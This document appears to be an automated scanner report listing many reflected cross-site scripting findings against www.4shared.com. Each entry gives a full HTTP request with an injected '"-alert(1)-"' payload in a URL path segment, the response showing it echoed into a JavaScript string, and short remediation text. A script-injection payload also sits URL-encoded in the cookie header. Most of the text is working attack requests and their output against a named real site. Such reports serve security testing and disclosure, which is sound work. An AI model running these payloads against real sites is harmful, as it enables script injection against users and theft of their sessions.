GET /main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17562"-alert(1)-"aa3f9a7695c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4481d"-alert(1)-"c7de45f4dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb2ec"-alert(1)-"e169cb5f37d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /premium.jspcb2ec"-alert(1)-"e169cb5f37d HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/premium.jspcb2ec"-alert(1)-"e169cb5f37d"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94440"-alert(1)-"30c8fdbfe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /press_room94440"-alert(1)-"30c8fdbfe4/ HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/press_room94440"-alert(1)-"30c8fdbfe4/"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var win ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35670"-alert(1)-"3015378b77f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.jsp35670"-alert(1)-"3015378b77f HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/privacy.jsp35670"-alert(1)-"3015378b77f"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f84fe"-alert(1)-"086eb606b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ddd"-alert(1)-"4eb60d1a81f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d8ddd"-alert(1)-"4eb60d1a81f/BAQD/1/music HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd1ba"-alert(1)-"41986b68520 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cd1ba"-alert(1)-"41986b68520/BAQD/1/photo HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858cf"-alert(1)-"bdd77823b47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /858cf"-alert(1)-"bdd77823b47/BAQD/1/video HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd152"-alert(1)-"2424e2b2550 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fd152"-alert(1)-"2424e2b2550/BBQD/1/books_office HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d14"-alert(1)-"821bdd307fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d0d14"-alert(1)-"821bdd307fa/BBQD/1/music HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6737"-alert(1)-"b10306e2af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c6737"-alert(1)-"b10306e2af/BBQD/1/photo HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82467"-alert(1)-"f15a819900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /82467"-alert(1)-"f15a819900/BBQD/1/video HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea29"-alert(1)-"e20dd6bf12d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /remindPassword.jspaea29"-alert(1)-"e20dd6bf12d HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/remindPassword.jspaea29"-alert(1)-"e20dd6bf12d"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e60e"-alert(1)-"3e718867f77 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resellers.jsp4e60e"-alert(1)-"3e718867f77 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/resellers.jsp4e60e"-alert(1)-"3e718867f77"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe67"-alert(1)-"1a6337f7227 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servletcbe67"-alert(1)-"1a6337f7227/ProgressStatus HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bde4"-alert(1)-"3d9d65c0126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/ProgressStatus1bde4"-alert(1)-"3d9d65c0126 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
